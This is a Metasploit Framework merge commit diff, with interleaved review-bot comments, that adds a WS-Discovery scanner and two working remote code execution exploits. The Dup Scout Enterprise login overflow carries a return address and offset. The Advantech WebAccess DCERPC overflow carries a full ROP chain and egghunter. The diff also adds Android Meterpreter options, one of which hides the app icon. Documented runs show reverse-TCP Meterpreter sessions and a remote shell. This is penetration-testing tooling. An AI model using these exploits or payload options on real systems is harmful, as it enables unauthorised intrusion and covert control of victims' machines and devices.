Merge remote-tracking branch 'upstream/master'

MS-2855/keylogger-mettle-extension
Tod Beardsley 2017-12-12 14:48:58 -06:00
commit f18f90e7e4
15 changed files with 610 additions and 10 deletions


@ -1,7 +1,7 @@
PATH
remote: .
specs:
metasploit-framework (4.16.22)
metasploit-framework (4.16.23)
actionpack (~> 4.2.6)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@ -17,7 +17,7 @@ PATH
metasploit-concern
metasploit-credential
metasploit-model
metasploit-payloads (= 1.3.18)
metasploit-payloads (= 1.3.19)
metasploit_data_models
metasploit_payloads-mettle (= 0.2.8)
msgpack
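Review bot: the branch is named `MS-2855/keylogger-mettle-extension`, yet `metasploit_payloads-mettle` stays pinned at `0.2.8` in this lockfile hunk and in the gemspec hunk below, while only `metasploit-payloads` moves to `1.3.19`. If the keylogger extension ships in a newer mettle gem, that pin needs to move in the same merge; if not, the branch name is misleading and the commit message should say what this merge actually brings in.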
@ -138,7 +138,7 @@ GEM
multi_json (~> 1.11)
os (~> 0.9)
signet (~> 0.7)
grpc (1.7.2)
grpc (1.7.3)
google-protobuf (~> 3.1)
googleapis-common-protos-types (~> 1.0.0)
googleauth (>= 0.5.1, < 0.7)
@ -178,7 +178,7 @@ GEM
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-payloads (1.3.18)
metasploit-payloads (1.3.19)
metasploit_data_models (2.0.15)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@ -193,7 +193,7 @@ GEM
method_source (0.9.0)
mini_portile2 (2.3.0)
minitest (5.10.3)
msgpack (1.1.0)
msgpack (1.2.0)
multi_json (1.12.2)
multipart-post (2.0.0)
nessus_rest (0.1.6)


@ -0,0 +1,34 @@
## Vulnerable Application
[Web Services Dynamic Discovery (WS-Discovery)](https://en.wikipedia.org/wiki/WS-Discovery) is a multicast discovery protocol utilising SOAP over UDP to locate web services on a local network.
Web service enabled devices typically include printers, scanners and file shares.
The reply from some devices may include optional vendor extensions. This data may include network information such as the device MAC address and hostname, or hardware information such as the serial number, make, and model.
## Verification Steps
1. Start `msfconsole`
2. Do: `use auxiliary/scanner/wsdd/wsdd_query`
3. Do: `set RHOSTS [IP]` (Default: `239.255.255.250`)
4. Do: `run`
## Scenarios
```
msf > use auxiliary/scanner/wsdd/wsdd_query
msf auxiliary(wsdd_query) > set rhosts 239.255.255.250
rhosts => 239.255.255.250
msf auxiliary(wsdd_query) > run
[*] Sending WS-Discovery probe to 1 hosts
[+] 10.1.1.184 responded with:
Address: http://10.1.1.184:3911/
Types: wsdp:Device, wprt:PrintDeviceType, wscn:ScanDeviceType, hpd:hpDevice
Vendor Extensions: {"HardwareAddress"=>"123456789ABC", "UUID"=>"12345678-1234-1234-abcd-123456789abc", "IPv4Address"=>"10.1.1.123", "Hostname"=>"HP09AAFB", "DeviceId"=>"MFG:HP;MDL:Photosmart 5520 series;DES:CX042A;", "DeviceIdentification"=>{"MakeAndModel"=>"Photosmart 5520 series", "MakeAndModelBase"=>"Photosmart 5520 series"}, "SerialNumber"=>"123456", "Services"=>" Print9100 SclScan RESTScan CIFS DOT4 LEDM", "AdapterType"=>"WifiEmbedded"}
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```


@ -0,0 +1,47 @@
## Vulnerable Application
Tested on Windows 10 x64
Install the application from the link below and enable the web server by going to Tools -> Advanced Options -> Server -> Enable Web Server on Port.
[Dup Scout Enterprise v 10.0.18](https://www.exploit-db.com/apps/84dcc5fe242ca235b67ad22215fce6a8-dupscoutent_setup_v10.0.18.exe)
## Verification Steps
1. Install the application and set the option above to enable the web server
2. Start msfconsole
3. Do: ```use exploit/windows/http/dup_scout_enterprise_login_bof```
5. Set options and payload
6. Do: ```run```
7. You should get a shell.
## Options
**RHOST**
IP address of the remote host running the server.
**RPORT**
Port that the web server is running on. Default is 80 but it can be changed when setting up the program or in the options.
## Scenarios
To obtain a shell:
```
msf > use exploit/windows/http/dup_scout_enterprise_login_bof
msf exploit(windows/http/dup_scout_enterprise_login_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/http/dup_scout_enterprise_login_bof) > set rhost 192.168.1.171
rhost => 192.168.1.171
msf exploit(windows/http/dup_scout_enterprise_login_bof) > set lhost 192.168.1.252
lhost => 192.168.1.252
msf exploit(windows/http/dup_scout_enterprise_login_bof) > run
[*] Started reverse TCP handler on 192.168.1.252:4444
[*] Generating exploit...
[*] Triggering the exploit now...
[*] Sending stage (179779 bytes) to 192.168.1.171
[*] Meterpreter session 1 opened (192.168.1.252:4444 -> 192.168.1.171:58969) at 2017-12-09 02:01:41 -0600
```
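Review bot: the numbered verification steps jump from 3 to 5, so either step 4 was dropped or the list needs renumbering. The step `Set options and payload` would also be clearer spelled out as the concrete `set RHOST`, `set LHOST` and `set payload` commands, as the scenario block already does.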


@ -0,0 +1,108 @@
## Vulnerable Application
[Advantech WebAccess <= 8.2](http://advcloudfiles.advantech.com/web/Download/webaccess/8.2/AdvantechWebAccessUSANode8.2_20170330.exe)
## Vulnerability Analysis
The stack overflow happens in sub_10004BC8:
```
.text:10004BC8 ; int __cdecl sub_10004BC8(char *Format, char)
.text:10004BC8 sub_10004BC8 proc near ;
.text:10004BC8 ;
.text:10004BC8
.text:10004BC8 lpWindowName = dword ptr -818h
.text:10004BC8 hWnd = dword ptr -814h
.text:10004BC8 lpClassName = dword ptr -810h
.text:10004BC8 Args = dword ptr -80Ch
.text:10004BC8 lpBaseAddress = dword ptr -808h
.text:10004BC8 hFileMappingObject= dword ptr -804h
.text:10004BC8 Dest = byte ptr -800h
.text:10004BC8 Format = dword ptr 8
.text:10004BC8 arg_4 = byte ptr 0Ch
.text:10004BC8
.text:10004BC8 push ebp
.text:10004BC9 mov ebp, esp
.text:10004BCB sub esp, 818h
.text:10004BD1 mov [ebp+lpWindowName], offset aDebugScreen1 ; "Debug Screen1"
.text:10004BDB mov [ebp+lpClassName], offset aDebugwclass1 ; "debugWClass1"
.text:10004BE5 lea eax, [ebp+arg_4]
.text:10004BE8 mov [ebp+Args], eax
.text:10004BEE mov ecx, [ebp+Args]
.text:10004BF4 push ecx ; Args
.text:10004BF5 mov edx, [ebp+Format]
.text:10004BF8 push edx ; Format
.text:10004BF9 lea eax, [ebp+Dest]
.text:10004BFF push eax ; Dest
.text:10004C00 call ds:vsprintf ; overflow
```
The corresponding IDL is below:
```
[
uuid(5d2b62aa-ee0a-4a95-91ae-b064fdb471fc),
version(1.0)
]
interface target_interface
{
/* opcode: 0x01, address: 0x00401260 */
void sub_401260 (
[in] handle_t arg_1,
[in] long arg_2,
[in] long arg_3,
[in] long arg_4,
[in][ref][size_is(arg_4)] char * arg_5,
[out][ref] long * arg_6
);
}
```
## Verification Steps
1. Start `msfconsole`
2. `use exploits/windows/scada/advantech_webaccess_webvrpcs_bof`
3. `set payload windows/meterpreter/reverse_tcp`
4. `set LHOST XXX.XXX.XXX.XXX`
5. `exploit`
6. **Verify** you get a connect back meterpreter
## Options
None.
## Scenarios
```
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/advantech.rc
[*] Processing scripts/advantech.rc for ERB directives.
resource (scripts/advantech.rc)> use exploit/windows/scada/advantech_webaccess_webvrpcs_bof
resource (scripts/advantech.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (scripts/advantech.rc)> set RHOST 172.16.175.136
RHOST => 172.16.175.136
resource (scripts/advantech.rc)> set LHOST 172.16.175.1
LHOST => 172.16.175.1
resource (scripts/advantech.rc)> exploit
[*] Started reverse TCP handler on 172.16.175.1:4444
[*] 172.16.175.136:4592 - Binding to 5d2b62aa-ee0a-4a95-91ae-b064fdb471fc:1.0@ncacn_ip_tcp:172.16.175.136[4592] ...
[*] 172.16.175.136:4592 - Bound to 5d2b62aa-ee0a-4a95-91ae-b064fdb471fc:1.0@ncacn_ip_tcp:172.16.175.136[4592] ...
[+] 172.16.175.136:4592 - Got a handle: 0x01ef2558
[*] 172.16.175.136:4592 - Trying target Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31...
[*] Sending stage (179779 bytes) to 172.16.175.136
[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.136:49206) at 2017-12-11 11:32:15 -0600
[*] 172.16.175.136:4592 - The DCERPC service did not reply to our request
meterpreter > shell
Process 5208 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\WebAccess\Node>
```
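Review bot: the verification steps never set `RHOST`, although the module cannot run without it and the scenario block does `set RHOST 172.16.175.136`; add a `set RHOST XXX.XXX.XXX.XXX` step before `exploit`. `Options: None.` is also misleading given that the module file in this same merge registers `Opt::RPORT(4592)`; listing `RPORT` with its default saves readers a `show options`.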


@ -4,7 +4,7 @@
via its SMTP server validation. The module sends a malicious response along in the
220 service ready response and exploits the client, resulting in an unprivileged shell.
he software is available for download from [SysGauge](http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe).
The software is available for download from [SysGauge](http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe).
## Verification Steps


@ -30,7 +30,7 @@ module Metasploit
end
end
VERSION = "4.16.22"
VERSION = "4.16.23"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev'
HASH = get_hash


@ -56,7 +56,12 @@ module Msf::Payload::Android
}
config = Rex::Payloads::Meterpreter::Config.new(config_opts).to_b
config[0] = "\x01" if opts[:stageless]
flags = 0
flags |= 1 if opts[:stageless]
flags |= 2 if ds['AndroidMeterpreterDebug']
flags |= 4 if ds['AndroidWakelock']
flags |= 8 if ds['AndroidHideAppIcon']
config[0] = flags.chr
config
end
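Review bot: the first config byte now carries a four-bit flag set (1 stageless, 2 debug, 4 wakelock, 8 hide app icon) instead of a bare `\x01` for stageless. That layout is a wire contract with the Android payload that parses the byte, so it should be documented in a comment here, ideally as named constants rather than literal `1`, `2`, `4`, `8`, with a pointer to the matching metasploit-payloads change (the bump to 1.3.19 in this merge) so the two sides cannot drift silently.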


@ -0,0 +1,18 @@
# -*- coding: binary -*-
require 'msf/core'
module Msf::Payload::Android::PayloadOptions
def initialize(info = {})
super(info)
register_advanced_options(
[
Msf::OptBool.new('AndroidMeterpreterDebug', [ false, "Run the payload in debug mode, with logging enabled" ]),
Msf::OptBool.new('AndroidWakelock', [ false, "Acquire a wakelock before starting the payload" ]),
Msf::OptBool.new('AndroidHideAppIcon', [ false, "Hide the application icon automatically after launch" ]),
]
)
end
end
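Review bot: the three `OptBool` entries omit the default element of the attribute array, so each option defaults to `nil` rather than `false`, and `show advanced` displays an empty current setting for them. Passing an explicit default, e.g. `Msf::OptBool.new('AndroidWakelock', [ false, "Acquire a wakelock before starting the payload", false ])`, makes the intended off-by-default behaviour visible.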


@ -2,6 +2,7 @@
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/android/payload_options'
require 'msf/core/payload/uuid/options'
module Msf
@ -16,6 +17,7 @@ module Payload::Android::ReverseHttp
include Msf::Payload::TransportConfig
include Msf::Payload::Android
include Msf::Payload::Android::PayloadOptions
include Msf::Payload::UUID::Options
#


@ -2,6 +2,7 @@
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/android/payload_options'
module Msf
@ -15,6 +16,7 @@ module Payload::Android::ReverseTcp
include Msf::Payload::TransportConfig
include Msf::Payload::Android
include Msf::Payload::Android::PayloadOptions
#
# Generate the transport-specific configuration


@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
# are needed when there's no database
spec.add_runtime_dependency 'metasploit-model'
# Needed for Meterpreter
spec.add_runtime_dependency 'metasploit-payloads', '1.3.18'
spec.add_runtime_dependency 'metasploit-payloads', '1.3.19'
# Needed for the next-generation POSIX Meterpreter
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.8'
# Needed by msfgui and other rpc components


@ -0,0 +1,142 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::UDPScanner
def initialize
super(
'Name' => 'WS-Discovery Information Discovery',
'Description' => %q{
Discover information from Web Services Dynamic Discovery (WS-Discovery)
enabled systems.
},
'Author' => 'Brendan Coles <bcoles[at]gmail.com>',
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://msdn.microsoft.com/en-us/library/windows/desktop/bb513684(v=vs.85).aspx'],
['URL', 'http://specs.xmlsoap.org/ws/2005/04/discovery/ws-discovery.pd'],
['URL', 'https://en.wikipedia.org/wiki/Web_Services_for_Devices'],
['URL', 'https://en.wikipedia.org/wiki/WS-Discovery'],
['URL', 'https://en.wikipedia.org/wiki/Zero-configuration_networking#WS-Discovery']
]
)
register_options [
Opt::RPORT(3702),
OptAddressRange.new('RHOSTS', [true, 'The multicast address or CIDR range of targets to query', '239.255.255.250'])
]
end
def rport
datastore['RPORT']
end
def wsdd_probe
probe = '<?xml version="1.0" encoding="utf-8" ?>'
probe << '<soap:Envelope'
probe << ' xmlns:soap="http://www.w3.org/2003/05/soap-envelope"'
probe << ' xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing"'
probe << ' xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"'
probe << ' xmlns:wsdp="http://schemas.xmlsoap.org/ws/2006/02/devprof">'
probe << '<soap:Header>'
# WS-Discovery
probe << '<wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To>'
# Action (Probe)
probe << "<wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe</wsa:Action>"
# Message identifier (unique GUID)
probe << "<wsa:MessageID>urn:uuid:#{SecureRandom.uuid}</wsa:MessageID>"
probe << '</soap:Header>'
probe << '<soap:Body>'
probe << '<wsd:Probe/>' # WS-Discovery type (blank)
probe << '</soap:Body>'
probe << '</env:Envelope>'
probe
end
def scanner_prescan(batch)
print_status "Sending WS-Discovery probe to #{batch.length} hosts"
@results = {}
end
def scan_host(ip)
vprint_status "#{ip}:#{rport} - Sending WS-Discovery probe"
scanner_send wsdd_probe, ip, datastore['RPORT']
end
def scanner_postscan(_batch)
if @results.empty?
print_status 'No WS-Discovery endpoints found.'
return
end
found = {}
@results.each_pair do |ip, responses|
responses.uniq.each do |res|
found[ip] ||= {}
next if found[ip][res]
response_info = parse_wsdd_response res
if response_info.nil?
print_error "#{ip} responded with malformed data"
next
end
msg = []
msg << "Address: #{response_info['Address']}"
msg << "Types: #{response_info['Types'].to_s.split(/\s+/).join(', ')}"
msg << "Vendor Extensions: #{response_info['VendorExtension']}" unless response_info['VendorExtension'].nil?
print_good "#{ip} responded with:\n#{msg.join("\n")}"
report_service(host: ip, port: rport, proto: 'udp', name: 'wsdd', info: response_info)
found[ip][res] = true
end
end
end
def parse_wsdd_response(wsdd_res)
info = {}
# Validate ProbeMatches SOAP response contains a ProbeMatch
begin
soap = ::Nokogiri::XML wsdd_res
return nil if soap.xpath('//soap:Body//wsd:ProbeMatches//wsd:ProbeMatch').empty?
rescue
return nil
end
# Convert SOAP response to Hash
begin
res = Hash.from_xml wsdd_res
rescue REXML::ParseException
return nil
end
# Use the first ProbeMatch
probe_match = res['Envelope']['Body']['ProbeMatches'].first
return nil unless probe_match[0].eql? 'ProbeMatch'
return nil if probe_match[1].nil? || probe_match[1].empty?
match = probe_match[1]
# Device Address
info['Address'] = match['XAddrs'] || ''
# Device Types
info['Types'] = match['Types'] || ''
# Optional vendor extensions
unless match['VendorExtension'].nil? || match['VendorExtension'].empty?
info['VendorExtension'] = match['VendorExtension']
end
info
end
end
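Review bot: the probe built in `wsdd_probe` opens with `<soap:Envelope` but closes with `</env:Envelope>`, so the XML is not well-formed and a strict parser on the device side may silently drop the probe; it should close with `</soap:Envelope>`. Two smaller points: the spec reference `http://specs.xmlsoap.org/ws/2005/04/discovery/ws-discovery.pd` looks truncated (`.pdf`), and the XPath in `parse_wsdd_response` hard-codes the `soap` and `wsd` prefixes, which Nokogiri only resolves if the response declares exactly those prefixes on its root element; a device that uses different prefixes for the same namespace URIs would raise inside the bare `rescue` and be reported as "malformed data", so matching on namespace URIs would be more robust.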


@ -64,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_error("Unable to login as #{user}")
return
end
store_valid_credential(user: username, private: password, proof: cookie)
store_valid_credential(user: user, private: password, proof: cookie)
print_status("Trying to upload payload")
filename = "#{rand_text_alpha_lower(8)}.php"


@ -0,0 +1,101 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Dup Scout Enterprise Login Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Dup Scout Enterprise
10.0.18. The buffer overflow exists via the web interface during
login. This gives NT AUTHORITY\SYSTEM access.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Chris Higgins', # msf Module -- @ch1gg1ns
'sickness' # Original discovery
],
'References' =>
[
[ 'EDB', '43145' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d\x25\x26\x2b\x3d"
},
'Targets' =>
[
[ 'Dup Scout Enterprise 10.0.18',
{
'Ret' => 0x10090c83, # jmp esp - libspp.dll
'Offset' => 780
}
],
],
'Privileged' => true,
'DisclosureDate' => 'Nov 14 2017',
'DefaultTarget' => 0))
register_options([Opt::RPORT(80)])
end
def check
res = send_request_cgi({
'uri' => '/',
'method' => 'GET'
})
if res and res.code == 200 and res.body =~ /Dup Scout Enterprise v10\.0\.18/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
connect
print_status("Generating exploit...")
evil = rand_text(target['Offset'])
evil << [target.ret].pack('V')
evil << make_nops(12)
evil << payload.encoded
evil << make_nops(10000 - evil.length)
vprint_status("Evil length: " + evil.length.to_s)
sploit = "username="
sploit << evil
sploit << "&password="
sploit << rand_text(evil.length)
sploit << "\r\n"
print_status("Triggering the exploit now...")
res = send_request_cgi({
'uri' => '/login',
'method' => 'POST',
'content-type' => 'application/x-www-form-urlencoded',
'content-length' => '17000',
'data' => sploit
})
handler
disconnect
end
end
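Review bot: the POST in `exploit` hand-sets `'content-length' => '17000'`, but the body it sends is `username=` plus a 10000-byte `evil`, then `&password=` plus another 10000 random bytes, roughly 20,000 bytes in total; if the client honours that key the declared length disagrees with the body, and if it does not the key is dead code. Dropping it and letting `send_request_cgi` derive the length from `data` (and using the conventional `'ctype'` key for the content type) is cleaner, or the mismatch should be explained in a comment if the target actually requires it. Also, the explicit `connect`/`disconnect` around `send_request_cgi` are redundant for `HttpClient`, and the `res` return value is never examined.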


@ -0,0 +1,141 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Advantech WebAccess 8.2.
By sending a specially crafted DCERPC request, an attacker could overflow
the buffer and execute arbitrary code.
},
'Author' => [ 'mr_me <mr_me[at]offensive-security[dot]com>' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'ZDI', '17-938' ],
[ 'CVE', '2017-14016' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02' ]
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 2048,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31',
{
'Ret' => 0x07036cdc, # pop ebx; add esp, 994; retn 0x14
'Slide' => 0x07048f5b, # retn
'Jmp' => 0x0706067e # pop ecx; pop ecx; ret 0x04
}
],
],
'DisclosureDate' => 'Nov 02 2017',
'DefaultTarget' => 0))
register_options([ Opt::RPORT(4592)])
end
def create_rop_chain()
# this target opts into dep
rop_gadgets =
[
0x020214c6, # POP EAX # RETN [BwKrlAPI.dll]
0x0203a134, # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll]
0x02032fb4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwKrlAPI.dll]
0x070738ee, # XCHG EAX,ESI # RETN [BwPAlarm.dll]
0x0201a646, # POP EBP # RETN [BwKrlAPI.dll]
0x07024822, # & push esp # ret [BwPAlarm.dll]
0x070442dd, # POP EAX # RETN [BwPAlarm.dll]
0xffffffff, # Value to negate, will become 0x00000001
0x070467d2, # NEG EAX # RETN [BwPAlarm.dll]
0x0704de61, # PUSH EAX # ADD ESP,0C # POP EBX # RETN [BwPAlarm.dll]
rand_text_alpha(4).unpack('V'),
rand_text_alpha(4).unpack('V'),
rand_text_alpha(4).unpack('V'),
0x02030af7, # POP EAX # RETN [BwKrlAPI.dll]
0xfbdbcbd5, # put delta into eax (-> put 0x00001000 into edx)
0x02029003, # ADD EAX,424442B # RETN [BwKrlAPI.dll]
0x0201234a, # XCHG EAX,EDX # RETN [BwKrlAPI.dll]
0x07078df5, # POP EAX # RETN [BwPAlarm.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x070467d2, # NEG EAX # RETN [BwPAlarm.dll]
0x07011e60, # PUSH EAX # ADD AL,5B # POP ECX # RETN 0x08 [BwPAlarm.dll]
0x0706fe66, # POP EDI # RETN [BwPAlarm.dll]
rand_text_alpha(4).unpack('V'),
rand_text_alpha(4).unpack('V'),
0x0703d825, # RETN (ROP NOP) [BwPAlarm.dll]
0x0202ca65, # POP EAX # RETN [BwKrlAPI.dll]
0x90909090, # nop
0x07048f5a, # PUSHAD # RETN [BwPAlarm.dll]
].flatten.pack("V*")
return rop_gadgets
end
def exploit
connect
handle = dcerpc_handle('5d2b62aa-ee0a-4a95-91ae-b064fdb471fc', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
# send the request to get the handle
resp = dcerpc.call(0x4, [0x02000000].pack('V'))
handle = resp.last(4).unpack('V').first
print_good("Got a handle: 0x%08x" % handle)
egg_options = { :eggtag => "0day" }
egghunter, egg = generate_egghunter(payload.encoded, payload_badchars, egg_options)
# apparently this is called a ret chain
overflow = [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Jmp']].pack('V')
overflow << [target['Ret']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << create_rop_chain()
overflow << egghunter
overflow << egg
overflow << rand_text_alpha(0x1000-overflow.length)
# sorry but I dont like msf's ndr class.
sploit = [handle].pack('V')
sploit << [0x000138bd].pack('V') # opcode we are attacking
sploit << [0x00001000].pack('V') # size to copy
sploit << [0x00001000].pack('V') # size of string
sploit << overflow
print_status("Trying target #{target.name}...")
begin
dcerpc_call(0x1, sploit)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
ensure
disconnect
end
handler
end
end
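Review bot: `resp = dcerpc.call(0x4, ...)` at the top of `exploit` is used without any check; if the service does not answer or returns fewer than four bytes, `resp.last(4).unpack('V').first` raises `NoMethodError` or feeds `nil` into the `"0x%08x"` format instead of giving a clear failure. Guard it, e.g. `fail_with(Failure::UnexpectedReply, 'No handle returned') unless resp && resp.length >= 4`. The `rescue Rex::Proto::DCERPC::Exceptions::NoResponse` around `dcerpc_call` also has an empty body; a short `vprint_status` there would explain the "did not reply to our request" line that appears in the documented scenario, and the `# apparently this is called a ret chain` and `# sorry but I dont like msf's ndr class` comments should be replaced with a factual description of what each block builds.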